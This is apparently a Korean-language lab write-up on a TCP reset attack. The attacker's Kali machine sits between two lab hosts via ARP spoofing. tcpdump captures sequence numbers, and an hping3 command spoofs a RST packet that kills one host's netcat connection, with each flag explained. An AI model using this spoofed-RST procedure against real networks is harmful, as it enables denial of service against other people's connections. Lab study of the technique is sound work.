TCP 통신 기반 DoS 공격 실습

뭔소리냐면

A(10.200.181.5) 와 B(10.200.181.6, nc서버)이 서로 nc으로 통신하고 있음.

그 사이 kali가 껴서 A를 끊어버릴 것이다. 어떻게 해야 할까?

 

 

1. ARP 스푸핑

이전 게시글에서 했었다.

자세한 설명은 생략한다.

 

2. 칼리에서 tcpdump를 켠다

tcpdump -S -n port 4000

 

 

3. B에서 nc 통해 포트를 오픈한다. 그리고 A가 연결해서 몇마디 나눠보셈

 

4. tcpdump 확인.

 

 

5. 나는 10.200.181.5의 연결을 끊을 것이다.

hping3 -s 4000 -a 10.200.181.6 -p 60378 -M 2680635114 -L 0 -R -c 1 10.200.181.5

 

[-s]: 출발지 port

[-p]: 목적지 포트

[-a]: 스푸핑할 ip

[-M]: sequence number

[-L]: ACK number. RST 날릴거라 이거 필요없음

[-R]: RST 플래그

[-c]: 보낼 패킷 수

 

10.200.181.6이 10.200.181.5에게 RST 날린 것처럼 유도하는 것임.

여기서 sequence number는 10.200.181.5가 10.200.181.6으로 보낸 가장 최신 패킷의 ack number를 써주면 된다.

 

 

결과

kali

centOS 6.9 (10.200.181.5)

10.200.181.5가 억울하게 연결이 끊긴 것이 보이는가?

그럼 성공했다.